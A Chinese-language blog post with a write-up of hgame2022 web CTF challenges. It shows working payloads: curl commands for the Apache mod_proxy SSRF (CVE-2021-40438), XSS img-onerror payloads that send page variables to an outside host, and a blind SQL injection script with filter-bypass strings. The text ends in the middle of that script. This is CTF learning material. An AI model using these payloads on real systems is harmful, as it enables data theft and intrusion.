<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,web,">










<meta name="description" content="又是一年hgame，话说去年week4的wp一直鸽着（逃">
<meta name="keywords" content="ctf,web">
<meta property="og:type" content="article">
<meta property="og:title" content="hgame2022 web 复现">
<meta property="og:url" content="http://yoursite.com/2022/01/28/hgame2022-web-wp/index.html">
<meta property="og:site_name" content="k0t0r1の家">
<meta property="og:description" content="又是一年hgame，话说去年week4的wp一直鸽着（逃">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b1260cc5f436500ae774c2da96648408.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/a4711006ee5772796c7592f2d44629f2.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/f22e024b75184c2398f2051bd42106dc.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b1480d9e4998b4d278b7412ecf92b388.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/867163df92482967e021142b3c0ea2eb.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b437f1544b106dfa3d5dd9933d49f08e.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/562618a42516be352f2c4bd70f1d7886.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/5ef28d73e339deb2d8d2c47aea28c3eb.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/61435ced94a0ef69e36f1af5d70c8f8c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/8b753ad44217fda42af8be9491022960.png">
<meta property="og:updated_time" content="2022-02-04T15:03:49.497Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="hgame2022 web 复现">
<meta name="twitter:description" content="又是一年hgame，话说去年week4的wp一直鸽着（逃">
<meta name="twitter:image" content="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b1260cc5f436500ae774c2da96648408.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2022/01/28/hgame2022-web-wp/">





  <title>hgame2022 web 复现 | k0t0r1の家</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">k0t0r1の家</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2022/01/28/hgame2022-web-wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="k0t0r1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://shifeng-kaze.cn/blog/head/kotori.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k0t0r1の家">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">hgame2022 web 复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2022-01-28T21:51:59+09:00">
                2022-01-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>又是一年hgame，话说去年week4的wp一直鸽着（逃</p>
<a id="more"></a>
<h1 id="Week1"><a href="#Week1" class="headerlink" title="Week1"></a>Week1</h1><h2 id="easy-auth"><a href="#easy-auth" class="headerlink" title="easy_auth"></a>easy_auth</h2><p>这题真的是麻了，看wp我人傻了，我就说第一周的题怎么可能难。看到auth有想过jwt验证，没想到密钥是空的，搞得去找注入点自闭了快一个星期，寄</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b1260cc5f436500ae774c2da96648408.png" alt=""></p>
<p>id改成1，username设置admin通过身份验证</p>
<h2 id="蛛蛛…嘿嘿♥我的蛛蛛"><a href="#蛛蛛…嘿嘿♥我的蛛蛛" class="headerlink" title="蛛蛛…嘿嘿♥我的蛛蛛"></a>蛛蛛…嘿嘿♥我的蛛蛛</h2><p>在header中看到了hint，但是乱码。尝试了一下，根据题目是脚本爬虫的意思？试了下<code>robots.txt</code>没东西，于是就尝试脚本跑点击</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf8 -*-</span><br><span class="line">import urllib</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = r&apos;https://hgame-spider.vidar.club/6b564bfe80&apos;</span><br><span class="line">http = requests.get(url, verify = False)</span><br><span class="line">while True:</span><br><span class="line">	if &apos;flag&#123;&apos; in http.content or &apos;hgame&#123;&apos; in http.content:</span><br><span class="line">		print 6666</span><br><span class="line">		print http.content</span><br><span class="line">		break</span><br><span class="line">	key = re.findall(r&quot;(\?key=[0-9a-zA-Z%]*)\&quot;&gt;&quot;,http.content)[0]</span><br><span class="line">	key_url = url+key</span><br><span class="line">	print key_url</span><br><span class="line">	http = requests.get(key_url, verify = False)</span><br><span class="line">	print</span><br><span class="line">	time.sleep(1)</span><br></pre></td></tr></table></figure>
<p>跑到一半跑不了了，进入页面查看header发现flag，emmm…感觉这hint不如没有，有些误导</p>
<h2 id="Tetris-plus"><a href="#Tetris-plus" class="headerlink" title="Tetris plus"></a>Tetris plus</h2><p>经典js题，另存页面查3000发现是假flag，下方的注释里是真flag</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/a4711006ee5772796c7592f2d44629f2.png" alt=""></p>
<h2 id="Fujiwara-Tofu-Shop"><a href="#Fujiwara-Tofu-Shop" class="headerlink" title="Fujiwara Tofu Shop"></a>Fujiwara Tofu Shop</h2><p>Header字段的题</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/f22e024b75184c2398f2051bd42106dc.png" alt=""></p>
<p><a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/X-Forwarded-For" target="_blank" rel="noopener">X-Forwarded-For</a>还能设置代理绕过内网IP检测，学到了</p>
<h1 id="Week2"><a href="#Week2" class="headerlink" title="Week2"></a>Week2</h1><h2 id="Apache"><a href="#Apache" class="headerlink" title="Apache!"></a>Apache!</h2><p>这题是去年的一个apache的洞（CVE-2021-40438）<br>具体调试复现可以参考这几篇文章<br><a href="https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html" target="_blank" rel="noopener">Apache mod_proxy SSRF（CVE-2021-40438）的一点分析和延伸</a><br><a href="http://blog.o3ev.cn/yy/438" target="_blank" rel="noopener">Apache mod_proxy SSRF（CVE-2021-40438）</a><br><a href="https://www.anquanke.com/post/id/263175" target="_blank" rel="noopener">https://www.anquanke.com/post/id/263175</a></p>
<p>当启用模块<code>mod_proxy</code>、<code>mod_proxy_http</code>时，若配置了ProxyPass，会通过设置的ip进行反向代理<br>Apache中有两种配置反向代理的方式<br>直接使用某个协议反代到某个IP和端口，比如<code>ProxyPass / &quot;http://localhost:8080&quot;</code><br>使用某个协议反代到unix套接字，比如<code>ProxyPass / &quot;unix:/var/run/www.sock|http://localhost:8080/&quot;</code><br>第二种情况就造成了这个漏洞，具体的复现之后再弄， 简单来说就是可以通过<code>unix:</code>和<code>|</code>之间填充多余4096个字符，就能发出目标地址是<code>|</code>后的值的TCP请求，从而达到SSRF</p>
<p>进入可以看到提示我们访问内网的<code>internal.host</code>，同时通过<code>www.zip</code>可以拿到dockerfile</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">version: &quot;3.8&quot;</span><br><span class="line">services:</span><br><span class="line">  apache:</span><br><span class="line">    image: httpd:2.4.48-alpine</span><br><span class="line">    volumes:</span><br><span class="line">      - ./static:/usr/local/apache2/htdocs</span><br><span class="line">      - ./httpd.conf:/usr/local/apache2/conf/httpd.conf</span><br><span class="line">      - ./httpd-vhosts.conf:/usr/local/apache2/conf/extra/httpd-vhosts.conf</span><br><span class="line">    links:</span><br><span class="line">      - internal.host</span><br><span class="line">    depends_on:</span><br><span class="line">      - internal.host</span><br><span class="line">    ports:</span><br><span class="line">      - 60010:80</span><br><span class="line">  nginx:</span><br><span class="line">    image: nginx:alpine</span><br><span class="line">    container_name: internal.host</span><br><span class="line">    volumes:</span><br><span class="line">      - ./default.conf:/etc/nginx/conf.d/default.conf</span><br></pre></td></tr></table></figure>
<p>可以看到边缘服务器是apache，而内网是nginx。而apache的版本2.4.48正好符合CVE-2021-40438的要求</p>
<p>接着在<code>httpd.conf</code>中查看<code>mod_proxy</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">LoadModule proxy_module modules/mod_proxy.so</span><br><span class="line">LoadModule proxy_connect_module modules/mod_proxy_connect.so</span><br><span class="line">#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so</span><br><span class="line">LoadModule proxy_http_module modules/mod_proxy_http.so</span><br><span class="line">#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so</span><br><span class="line">#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so</span><br><span class="line">#LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so</span><br><span class="line">#LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so</span><br><span class="line">#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so</span><br><span class="line">#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so</span><br><span class="line">#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so</span><br><span class="line">#LoadModule proxy_express_module modules/mod_proxy_express.so</span><br><span class="line">#LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so</span><br></pre></td></tr></table></figure></p>
<p>可以看到<code>mod_proxy</code>和<code>mod_proxy_http</code>都可以使用</p>
<p>然后在<code>httpd-vhosts.conf</code>中可以看到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;VirtualHost *:80&gt;</span><br><span class="line">    ServerAdmin webmaster@summ3r.top</span><br><span class="line">    DocumentRoot &quot;/usr/local/apache2/htdocs&quot;</span><br><span class="line">    ServerName dummy-host.example.com</span><br><span class="line">    ServerAlias www.dummy-host.example.com</span><br><span class="line">    ErrorLog &quot;logs/dummy-host.example.com-error_log&quot;</span><br><span class="line">    CustomLog &quot;logs/dummy-host.example.com-access_log&quot; common</span><br><span class="line">    &lt;Location /proxy&gt;</span><br><span class="line">      ProxyPass https://www.google.com</span><br><span class="line">    &lt;/Location&gt;</span><br><span class="line">&lt;/VirtualHost&gt;</span><br></pre></td></tr></table></figure></p>
<p>proxy的路径是<code>/proxy</code>，这里一开始没注意到，搞得我一直没办法触发</p>
<p>最后看到nginx的配置文件<code>default.conf</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location = /flag &#123;</span><br><span class="line">       return 200 &quot;hgame&#123;xxx&#125;&quot;;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure></p>
<p>flag是在<code>/flag</code>路径</p>
<p>先测试一下，<code>curl &quot;http://httpd.summ3r.top:60010/proxy?unix:testsocket|http://test/&quot;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b1480d9e4998b4d278b7412ecf92b388.png" alt=""></p>
<p>成功响应了503，接着去获取flag<br><code>curl &quot;http://httpd.summ3r.top:60010/proxy?unix:$(python3 -c &#39;print(&quot;A&quot;*7701, end=&quot;&quot;)&#39;)|http://internal.host/flag&quot;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/867163df92482967e021142b3c0ea2eb.png" alt=""></p>
<p>成功获得flag</p>
<h2 id="webpack-engine"><a href="#webpack-engine" class="headerlink" title="webpack-engine"></a>webpack-engine</h2><p>这题说实话做的过程有点窒息，不太熟悉chrome结果就直接尝试手动解混淆，解出了个这个<br><code>filiiililil4g:&#39;YUdkaGJXVjdSREJ1ZEY5bU1ISTVaWFJmTWw5RGJFOXpNMTlUTUhWeVkyVmZiVUJ3ZlE9PQo=&#39;</code><br>一眼看上去很怪就觉得是不是有加密函数，于是尝试了很久没整出来</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/b437f1544b106dfa3d5dd9933d49f08e.png" alt=""></p>
<p>最后发现chrome中可以直接得到运行后的结果，真的脑溢血<br>然后把这个拿去两次base64解密就得到flag了</p>
<h2 id="At0m的留言板"><a href="#At0m的留言板" class="headerlink" title="At0m的留言板"></a>At0m的留言板</h2><p>这题的难点在于只有提供截图，模糊测试的过程令人脑溢血，提供的模板基本没有用<br>首先尝试了一下<code>&lt;script&gt;</code>，检测匹配的方式应该是这样<code>&lt;script.*&gt;.*&lt;/script&gt;</code>，检测到就会被替换。而<code>&lt;span&gt;、&lt;div&gt;、&lt;img&gt;、&lt;p&gt;、&lt;b&gt;</code>这些常用标签都是能用的，但是因为不能直接看到页面源码，尝试了很多次才确认并不是被替换为空而是被认为是标签。而<code>&lt;svg&gt;、&lt;iframe&gt;</code>这些就很窒息了，看不到源码根本不知道到底是bot的问题没有解析还是被转义了，因为像<code>&lt;xxx&gt;</code>这种自定义标签也应该是被隐藏的，但依旧是以字符串被显示出来了，而把<code>&lt;&gt;</code>转义掉然后又留下几个常用标签不转义总觉得不太对<br>然后是迷惑点flag，在提供的模板里flag放在全局的flag中，但后面去问出题人才知道并不是，那你倒是提醒一下啊？一开始尝试用img onerror去打回数据<br><code>&lt;img src=&quot;&quot; onerror=&quot;t=new XMLHttpRequest;t.open(&#39;GET&#39;, &#39;http://domain/?&#39;+flag,!0),t.send(&#39;flag&#39;);&quot;&gt;</code><br>什么都没有，试了下onerror也没被过滤掉，真的就一脸懵逼</p>
<p>后面尝试了一下<code>&lt;body onload=&quot;alert(&#39;132&#39;)&quot;&gt;</code>，发现响应了不一样的东西</p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/562618a42516be352f2c4bd70f1d7886.png" alt=""></p>
<p>截图估计是对应位置上空白所以响应这个，于是又尝试了一下<code>&lt;img src=x onerror=document.write(123)&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/5ef28d73e339deb2d8d2c47aea28c3eb.png" alt=""></p>
<p>因为页面只剩下123，所以自然也是空白，就想着能用这种方式进行语句调试<br>接着又尝试了一下<code>&lt;img src=x onerror=document.write(flag)&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/61435ced94a0ef69e36f1af5d70c8f8c.png" alt=""></p>
<p>发现js并没有被触发，就说明flag可能有问题。尝试把flag打回来<br><code>&lt;img src=x onerror=&quot;t=new XMLHttpRequest;t.open(&#39;GET&#39;, &#39;http://shifeng-kaze.cn/xss/?&#39;+window.flag,!0),t.send(&#39;flag&#39;);document.write(123);&quot;&gt;</code><br>发现值是<code>undefined</code>，这时才去问出题人咋回事，告诉我变量不是flag，麻了</p>
<p>于是循环获取所有js的变量，然后判断是否字符串和是否有hgame子串，再打回来<br><code>&lt;img src=x onerror=&quot;g=window;flag=&#39;&#39;;for(prop in g){if(typeof(g[prop])==&#39;string&#39;){if(g[prop].search(&#39;hgame&#39;)!=-1){flag=prop+&#39;:&#39;+g[prop]}}};t=new XMLHttpRequest;t.open(&#39;GET&#39;, &#39;http://domain/?&#39;+flag,!0),t.send(&#39;xss&#39;);&quot;&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hgame2022_web_wp/8b753ad44217fda42af8be9491022960.png" alt=""></p>
<p>成功打回flag，变量名是F149_is_Here，孬题<br>后来出题人还在春节在全局变量中放了红包的领取码，把<code>search</code>匹配给去掉就可以获得</p>
<h2 id="Pokemon"><a href="#Pokemon" class="headerlink" title="Pokemon"></a>Pokemon</h2><p>真注入题，注释提示了<code>?id=1</code>，尝试了一下发现注不了，但发现error页面是由code控制，且还会报错，尝试<code>code=404^1^1</code>和<code>code=404^0^1</code>结果不同，于是尝试盲注<br>其中将<code>select、/**/ 、from、=、where、or</code>替换为空，双写即可绕过，<code>=</code>用<code>like</code>代替<br>然后就是脚本跑flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf8 -*-  </span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url = r&quot;http://121.43.141.153:60056/error.php?code=&quot;</span><br><span class="line">user = &quot;1\\&quot;</span><br><span class="line"></span><br><span class="line">l1 = 0</span><br><span class="line">r1 = 100</span><br><span class="line"></span><br><span class="line">while(l1&lt;=r1):</span><br><span class="line">	timeout = 0</span><br><span class="line">	mid1 = (l1 + r1)/2</span><br><span class="line">	# payload = &apos;404^if(length(database())&gt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">	# payload = &apos;404^if((selselectect/*/**/*/length(group_concat(table_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database())&gt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">	# payload = &apos;404^if((selselectect/*/**/*/length(group_concat(column_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/\&apos;fllllllllaaaaaag\&apos;)&gt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">	payload = &apos;404^if((selselectect/*/**/*/length(group_concat(flag))/*/**/*/frfromom/*/**/*/fllllllllaaaaaag)&gt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">	sql_url = url + payload</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	print payload</span><br><span class="line">	http = requests.get(sql_url)</span><br><span class="line">	if &apos;404&apos; in http.content:</span><br><span class="line">		# 404时则&gt;mid1</span><br><span class="line">		l1 = mid1 + 1</span><br><span class="line">		time.sleep(1)</span><br><span class="line">	else:</span><br><span class="line">		# 405时则&lt;=mid1</span><br><span class="line">		# payload = &apos;404^if(length(database())&lt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">		# payload = &apos;404^if((selselectect/*/**/*/length(group_concat(table_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database())&lt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">		# payload = &apos;404^if((selselectect/*/**/*/length(group_concat(column_name))/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/\&apos;fllllllllaaaaaag\&apos;)&lt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">		payload = &apos;404^if((selselectect/*/**/*/length(group_concat(flag))/*/**/*/frfromom/*/**/*/fllllllllaaaaaag)&lt;&apos;+str(mid1)+&apos;,1,0)^1&apos;</span><br><span class="line">		sql_url = url + payload</span><br><span class="line">		print payload</span><br><span class="line">		http = requests.get(sql_url)</span><br><span class="line">		if &apos;404&apos; in http.content:</span><br><span class="line">			# 404时则&lt;mid1</span><br><span class="line">			r1 = mid1 - 1</span><br><span class="line">			time.sleep(1)</span><br><span class="line">		else:</span><br><span class="line">			# 405时则=mid1</span><br><span class="line">			break</span><br><span class="line">			</span><br><span class="line">print &quot;Length:&quot;+str(mid1)</span><br><span class="line"></span><br><span class="line">flag = &apos;&apos;</span><br><span class="line"></span><br><span class="line">for i in range(mid1):</span><br><span class="line">	l2 = 0</span><br><span class="line">	r2 = 128</span><br><span class="line"></span><br><span class="line">	while(l2&lt;=r2):</span><br><span class="line">		timeout = 0</span><br><span class="line">		mid2 = (l2 + r2)/2</span><br><span class="line">		# payload = &apos;404^if(ascii(substr(database(),&apos;+str(i+1)+&apos;,1))&gt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">		# payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database()),&apos;+str(i+1)+&apos;,1))&gt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">		# payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/\&apos;fllllllllaaaaaag\&apos;),&apos;+str(i+1)+&apos;,1))&gt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">		payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(flag)/*/**/*/frfromom/*/**/*/fllllllllaaaaaag),&apos;+str(i+1)+&apos;,1))&gt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">		sql_url = url + payload</span><br><span class="line">		print payload</span><br><span class="line">		http = requests.get(sql_url)</span><br><span class="line">		if &apos;404&apos; in http.content:</span><br><span class="line">			# 404时则&gt;mid2</span><br><span class="line">			l2 = mid2 + 1</span><br><span class="line">			time.sleep(1)</span><br><span class="line">		else:</span><br><span class="line">			# 405时则&lt;=mid2</span><br><span class="line">			# payload = &apos;404^if(ascii(substr(database(),&apos;+str(i+1)+&apos;,1))&lt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">			# payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/table_schema/*/**/*/like/*/**/*/database()),&apos;+str(i+1)+&apos;,1))&lt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">			# payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/table_name/*/**/*/like/*/**/*/\&apos;fllllllllaaaaaag\&apos;),&apos;+str(i+1)+&apos;,1))&lt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line">			payload = &apos;404^if(ascii(substr((selselectect/*/**/*/group_concat(flag)/*/**/*/frfromom/*/**/*/fllllllllaaaaaag),&apos;+str(i+1)+&apos;,1))&lt;&apos;+str(mid2)+&apos;,1,0)^1&apos;</span><br><span class="line"></span><br><span class="line">			sql_url = url + payload</span><br><span class="line">			print payload</span><br><span class="line">			http = requests.get(sql_url)</span><br><span class="line">			if &apos;404&apos; in http.content:</span><br><span class="line">				# 404时则&lt;mid2</span><br><span class="line">				r2 = mid2 - 1</span><br><span class="line">				time.sleep(1)</span><br><span class="line">			else:</span><br><span class="line">				# 405时则=mid2</span><br><span class="line">				break</span><br><span class="line"></span><br><span class="line">	flag = flag + chr(mid2)</span><br><span class="line">	print 